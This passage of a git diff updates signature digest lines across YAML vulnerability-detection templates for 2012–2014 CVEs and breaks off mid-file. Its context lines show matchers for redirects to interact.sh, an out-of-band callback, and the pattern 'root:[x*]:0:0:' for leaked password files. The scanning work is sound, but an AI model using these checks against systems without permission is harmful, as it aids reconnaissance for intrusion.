4a0a00473045022010aec4fe04865f4eabfa7e948e33d059e148339a9540fb511de0eb334a768f41022100e505188e0ace916c3bc4885095fcb65e40cd862216c529ba80543dd09685dc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 8d7a4ee380..b47b024a08 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4b0a00483046022100a780391cdc672f4223dd342fe50b491b34586f2aad2efe777c4c1a6869bc8d73022100db537c9b2ba8b3c6a0b3c1c394d77b5ff42000bdf684cf1ceb7becbad4ad1732:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022013293c98e07f12edf9d1f3d000ba3fa86fbf30b82dcfbb06a4f8460db98efafb022100d39f1129c9a5d24485b0b291cbd17ba2cec334ee0e4c828663f38c9364ad3701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 143b3f7ddf..0f849fab3a 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 490a00463044022063d70a349fa4e6f9e223a1dabe4b9ad5cdc266515a26e11f27dfc637e7f0fd39022001bb8b7ceaf7dcb8a07b5b4b28dd9c4fdb530c02cdb3985e6701cc256987d676:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a29b3ba7b4fc6370649ee185d1fdca1e74d392a33a1597980ac9a89e6517a059022100da2af3881e23d827affe61ccfc11ce9fcc2b0f886d8f8d54ff8cbd0e4abffa64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index c69a314594..02ee191d6d 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220786249adcb4ce3e55d1ca6de3d33f6c8017121dd2f163e14a0b3bf83ffa1b93602202c7f56390d67f5075da2dda18ac5a6500833a8104c64cf1f8f72401fabb9eac0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dda415109ba2cda080ed8ecbb7b98a58933eaa98cacad48075e7a2d3af50b0dc022100d053c95fd987cf366771bfb46b314c9393a17ce10755a706b9b1850ab5f44bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 7b78c87d4b..cfc4e90558 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 490a0046304402200a35cd39c314fe6d16bfc240af25a1c950b066fbc707901cd7a6ee5c1ccd06d5022042ab78f8690f47843c1ffc4f896de1a89bac33831ef038c3d289e733102cb406:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d215bb01f04838f732552e48fb03335a6fea562f38ed0e197b350adfdaf0a7b1022022aa94622f9750f31c888967ea3c21837d0c02dcf057ccb42d33f3a83d695e1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 108581e4fd..b4a7168a78 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220137dcf596b4a91b69be8d79f762dd1b3b1902d36f8fb40b3239d78f327a4613302210099fc96d3741b66a00f405ac5da30d20ed8d4ed2853ca7dfdcad6fa4010e24014:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022056ce5e93b88defde371311bf2d8b41539c48d4a2452338a444ebc972f9fbce5002210082e35cd56f5d46795fd6af1e6db2f1185e3c1dd35ec7b2f8615242cde6372b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index f5f91a64ad..d8471c9a5c 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -59,5 +59,4 @@ http: - 200 - 400 condition: or - -# digest: 4b0a00483046022100831f97e225071a17bd23c67a7b0cf8de2c53c98ffe16eeb293d1162ffdd9960d022100bd75a26ecbaafa9c9c7340bd4df5c6920ca29e6d8ba50e2e808775ef6a896a83:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202fbdae8e1e7c0eb586c7e9237b73def7a1963447f4940dc9ec5e397c6a202b8f02207d042bd342725bd4ef287dbe6eae79225d21d67f9fa5e7bc39a1a4badba32ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 7f9c944083..a863199a08 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100df033bc107e6cf00ac0f6e4d868261fd8748d2a2a031d914fc0bbc72318cf858022065ebb0d332c58458303aef9c0d4c7e7af205dcd37f544455472f287e0fc6493b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a594e023a70cf2d71f3d2b2e259d483bc5a3e79694174362079c048247661a0002203139a0b0ba5fa955ef16398ac426142d1f2a493ef9c858fcb8aef62021c9bb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 43edac1f1c..630095be78 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a00463044022056e8b56ab65e3b48d0538649c28fd47788e9bf9528c41329f4a452627dbab09102202e90f4be9a6af22d16c2ebdd26d956c06e749bd0e893b38ecd4f5545eae26a08:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022055adc42fa13897c905e9c92591c8a22f9321eac5986d51c74ed82ba1ddb1fa35022023bc8bc540f3790381d70f1dcb14806d5ec4f2bd173b904b48f7ab929c9d779e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 0a2010b321..0872396eff 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008f7a7f47358dde6cd29de824f3b2b3bc856408e8bd9185467a9072b13437e89d022020115882207687f77e6705117e7dbac64123cafb102fec7ce5fb2ee462d9b702:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100813d1bafa2302f33430d67b2c93f440dd5cff43b5bfad8e2e1b06d36ecba000202210082c4f36c75263ce3dc61491715057e421894b85493d83fec604e39dbf9734b9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 4eed2d5edf..704fda1bb9 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a913ed60262a01322451c5f2d3b8e64857ef8568ad838d50983cbb029a09f832022100a2c92319f64442cfe591d2eb3a0dd3a4abda7803091659701e148ed803eea4a0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202d17c0f633dc38ea95183fe90882e6c35a67ebb676fd03a7a35907c6b4952ef4022100ab1cc8b04748357d37c7eb6a33af5b26f60673c0ddfbaeef50831f7bbf6b6f1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index e04cb3b067..91afef1e17 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fe0a32ae8e4ecf3d1d58ccc38f6839439b524a68c25ad879978e57b150be68bd022002be101d9cf2630e5ddd390c6c0aefe3ba6bb127c72fbf51787f2b752c4b35c4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205dc7cee879ae1acab3f14c5c1aceca554b98ff71f33982847aee137eff73fb98022100a98c4f642bfd46ea5f542107e5db565bba1e6dd31545e83c3136d9b8fe7c2eaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 4673419276..165d75bd80 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f259a88b52e2ad665a778b9a08fc341c38d2fc1c46290fc7b5efc78ca37fa79b022100878cc33ac07eab447453275373bbea21d4b953e84a3e1a8457e9749215b30553:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ee978a6847fa15da99a70ed9ab5ca5c2a079256da46b49e9c05535d5eb3b70e40220363c1b85cb60942f57ec7282dffade92c2a3a610f83ac914878b844e5fc55557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 97ea7ac7c3..5561e05352 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c3734c59b4e4d90817ad7c6569628ae588b69f931f576ef9a9bf044f87671976022100835c715ed62b85e057eea6e7156415c741954af50626929c194d457e82dde793:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d03f84246a493cd512eb8230e1a35ec84fa41de21a077ea6d2c4dab22a103525022100b44f802fd7cb0a04d390070581aa13e14c410e1c09df08b2745039d7509a9e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index d23a7b5bd5..9ea73b680b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e8d8664f6eab50ce396c3b67545f58ced5d326982b22fd3711775e69d38a7b2c022100e9fbf0cbd7ab21973544c72c5b3e29c9a16e7de3198901e0f5a5c0f8fd8904a1:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022029864e969fff160573cd946f8f0933da6b13311ebfc39c1f94842fbe7f3cafb4022042e0edad95bd3b5747d90eebcb932683a4d7187270d2b68d7224429d173ae1de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 2b9b97982f..bf3fe3c9ba 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203afa950e5ce229e6228ec2ef5c0845b355a29918b5c97741523e7ea40e211c8202202ee46fb6c3bffe04f7bfb79c11b0dd20115fdc6764bd0d12566a3c7ce277e450:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a1b7866f2029eabe29d2cfca89bafdac2501b90ed23e57c6129803f9cfb0bd92022077a5a7a397da518ba7567869eaa858efe618411020d7c58ba848181ba5cf504d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 52cf6cb140..5327d97ebd 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -62,5 +62,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 4b0a00483046022100d3f562c8d361425c45e3acf4221f26bad4716dc1ce06d655e64a75ebf40d4f14022100d3390696ac408d24f53d33de5d6ee2257816afd2281f18a7f7b2e73aca0383a7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f0c9dd2ea1a794ac47e3ccafd77c44fa380fdb336a2806378ddf42379f8edac6022100b872802cc93dcd9d0eb0c2c0b207186c8c19d73407e987d5ee337e044974b507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 88f07f9027..9e357d4a90 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022069608ebdbaf3cbfa255c56d8bf25ba671703e8cf6a258c2a97893455c707f8bd022047972bc4938ff11e0d5e400307914fa23bae643502efd933d946094b6708c8a7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b3a84dc4e4624db2f3fc424272f830fd8b63d1de5fb9a26789159d8dee7f888202210087586ec73ef2049c880d829c1b39d6056d5c26cff890bf4d02c486e3cc2dda3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 7745b035bf..b5b01d66bd 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c36401fc803491ec79073878b4a6a8d8f349ebe1f68191cd6a3da3bf41a73e1c022059a1ce394c255bc241fdc588e37658797e1b335dfc839424ffc807145b2045f6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aeb2319672f4c9079c2eea8da3f6e3ed2415cc2b760332dea511f16f091560d60220451ac7265cd2a9842e97ae80dc33b9c64058de98b2b6d26839aa3ee7c035a4c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 06c499265b..99481780a7 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220097de2a151ae2fccfbbf186f446248d8888ace8bb7c2b81d26c62bf2fe01428202206473d4cd7013066342bf6c3a9979fef9e69618418d697547c7ad0c60b5023ad6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c9a06f569adfc97076a134ba1efc5cf0ae13234b94dab083220b30abc203c2b7022100f020708f50906f86a5dfeb627b7ce4ecd84f3cf103b3478c9a4415bb59e9ea06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 402f6f1370..896ac229d2 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -38,5 +38,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" - -# digest: 4b0a00483046022100e8b0f8f85e4f866e99466029f3be6214d0b3b2226d665dc8ccae6fcf261dd71b022100972a349a54ac3432f31fc6983a9390a27ad9673db1f48c2d7fa8d4d3e5ebff0f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d3d6ae2fd75ef3269d83c649cfe78d9d14de9c2817d90ed52b6c90b1fcf101880220432698bdc5da10b45a054906ce5a1107654f7a4dc6131e413dcc4851403fce38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 3fb2f9aee1..9447140dba 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008bec17332e8f29101fd43550101670cbb0317f26e74b8e3912dd6bf06e51bf330220486959047961eab5a8e32937b25d769512e904164c4a11c94d80cdb0f5dcae07:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e2feb6432950bdb39e0a3799a9d57e307f204543d16959b1db537df8b8fbacd022100bbaacc9ca4bbb07d0b3cef9bfad67ea8da246f50a889747f4f6858db9c7e15d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index b6a27b1411..06389c0418 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a4e813a9e6046113c33978b7925cc81799e3c28e7d325aec1ce57cb465aee6bc02203f9ec9f69abbf39852aa6a2232d8911be37fd6d2d97d85188291f7cb5c963d21:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fc63707c163f9ea1c9bc9f6afd2ad55a5d7d940f43249882ece74e8c8e4b851b022074ed80aff7682463eb067ea7d836c8b9ffa40b82c0ed553c1c3406d37b0f88d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index b9c45ab964..6a738e8205 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204e6ee2c8cd0db7322b0d9f482a1ba1043f49cfe6e7d0b4b0d795e0f09eda6192022100bedd9dfc61d24a2053b09b18c9db5ab22f0bce11f87a92c0561e37c098e3c806:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009ee3940c5163655962cc4c7c475339f477c0ec35b38f704bf854a8959ca1469b022100d1bae0fb8476ced53decf8fca8e852af88fa540188e2b9e6b992aa02774dda05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 89f98e0bfd..02d1c1c679 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203638ad44298ca1f701f1fe6c654a6b13dba9c6b3765ce3a5ee886c80910b7a5302201eda4f15cb318b2b378f380ab5f782e30464922e6a428a94fcbba6b1d46397d3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c4bc899933e8fbcfc9325e9e5ccbe1b3951b0f37c963a59895f92dc1c69be8b1022100c36602f6acf1b2644ba4f6d36d111162284b2a3ecc2a9eeca5d8eea83a400386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 714f5f4f28..e85f6ec507 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cfaef727a880f9a3f8544d0f111fe269639430aec39ca0a86eb402a7fbb5b12d022100978347471f9f75dcbe088d3041854d425be6010a0a174ee253e2fc8b3fae6967:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022012bdf30dedcbf967149c683f2b83db754622ca22a09900a26f3e5276b1c8a0ae022100b43c591e2854c1069349114eea67f9d272c1f750d4dc3936c5f7405fbbb8db2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 7ccbbbaf37..c34e7161ff 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022078f62c018ff0ce7a83c4dc1e17c0b9e727b7e9d2346b530aff1cdd05b03f20db02202b8a72a0e08bd242dd888530d42c0a4e3b54cda64d0bac5fb1294a8c140482ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bfbb9164887494e005c3c5893a58fb2b4d7ccfa4e2b59e7cca1d015b0d74a82102201852cc109a1b6eba49bd1ba6c07513ea813afe4925f443253e8dd7e5334bd80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 2ff3be6d0d..1a8d4de18c 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b8e7416bdf39bad8cfefb3a301e7c5995637a6261ee6becf49a69467ca84a650022047571baf95ce9fbe1f06647cfb47baf086aa6a3eb83f38af91c096b444e88b32:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210097880dbdabedc8e6cef9705c66c94d759899c3f379878a401eea80da89783080022100983cf5bbe02b42c29f5855064ecf366680681c2e48ff82f3448b04986649a6fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 9cbc609458..34c6be102c 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220409e1f576cc14c41553af93d5a6100302639bf4c9818d4e9016780d5970344b002203ef884f50e9862da0aa63106b8ab9da1d9b60b20ae7158bf75988a345d2d0c6c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202cc6a92f59cae850a2136962ccb6aa630feae15a79e4a42c3102ddd14e40a347022100a29ca6f85ccd9ee9dfa3d574444a1f709cec51c64a412586db7ce1259069bef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index e6ccbd7047..f6338f80d6 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f67e85a7b458adb96030e60f444bd7a30e413a55e24b3931e9941a5663c433e3022075a5a41822151dc09009a948348145ea2ff886786839c97f9f7de2673488913b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204a3c507761b4a4af70ed12b57664bb09590372ef5ee0216c6db4386dab13483502204dc18a65c0369bdb9df194f4d9584351a8e3e67fa726c4ce215a43cf87891d9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 8d709abed3..46693da741 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220558503140fabdb4643b404ff872b3f8c6b7ed78da0887d10d3ff5b39afeff24b0221009544d731989c3ed3c122dff11d9d16afb465ad5034b6546cb6b3a1b27385db98:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c71af5626c059ca7e97cfce23da8cc0fb0b6b3d2ee43494679d58b1c715c95e7022100b2f431ee2a3958e9ccaac3584ac9feefc76f90f08bb5b9c78b141605506d37ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 4ecac5f2b3..820d6b1dfd 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c29aecfff55430faa2cb0d091823fe5a6397463f309b6e03b78e2e752d5c2f8f02202c6a84533bd85d1183d8cee7dcca3faacf77cab7fc926bf7c501b17591d3b189:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200e55d79b3a2ce76764146a974c6f2a71c7cab40ae105daed4688dec74173eeb8022100e03c477ebfd6780f6c0049da74bfa54c2dd4ddedd42559f08afbb10e40f6b197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index e48f80b457..885a9117b3 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206be750591de3013b009930bc0458a67c4a9b789996a989b963ef85f2b8ef958f022050f4e6875e1181bcf51aaeeb023291168b41691010e33d291eeccbbc2efbcdfc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022061d02427dead5c870d383c291721999342466a675df06382a0aa22f1478c6b5b0220557fe8d0d91a5c32905572153acb45905f674f2431a59684f2993f087ab0dfa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index bf3cf50c7f..d5d237e732 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ccc8fc1aa7ecc83f8a7c0612d13d225f5a19ca63f109307328997b402b17e8d4022100e7239ded92f9c4a2432a71581989deba82fa49697f12f29d9ac5de646dccdb14:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9dbdab2468b61d28c53a3e3ff74f9199291b39f82bdb3eabe90f2749cf3c9c9022100b3f00ec17fd197eabd112248ad9223d41fa84338536ae17563f1497a47519a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index bfc0703807..df67423e2a 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -53,5 +53,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' - -# digest: 4b0a004830460221008ee2932bf2c15333af72be09ca4fc2096be83037d16fa37c62784d42fd5dc22d022100a32ec591b48409881ae68de96ed2dc407ece6136f3cc199e2e80001fb1bb8ee0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201912026cb68d674be47d434d0c13a1642fd527b37f09736c57d7eeb3ee8eb7a502204bce7c927be5494e06bc489793d9c2b80370201cb1af05aa239d1aa5e884f192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 51add47f00..331ef0ad1e 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203862855469b8e1cc4eef067cd5782e606c6b8d3d998a2473bd3ff5b324524d2b022052d73ad7f28e7f0cd2de3355ca13a12727526629db064d9866d28f26e1f97167:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202075c837a39f6b2adabbce0fd149f5b708840929bfdfbc152bd027c27b69eeaf02204b1587e7a2a19afc810c01f4e827444c3ebad7cfe9f0281f6381b3b52af04f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index dc7b4ea96f..6390d350f9 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008c619337bea11184a15374f9a4864e557579bcd597e25b03956356fcaa60a8fb022100a30991e7d749b4a86a4d6167f1b4968ebbcb9046c4f39b51ca791225e8d2da86:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a5fa655cf346090617923527a4e9a3515e21716dfbe08344631f3331f1b41c8e02200faecd769e19d29a5d2525ba618c3b0d7fcaa1cc7b00ea870fa4bba8cdf190e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 92c3072e09..67a5c8c1e5 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ 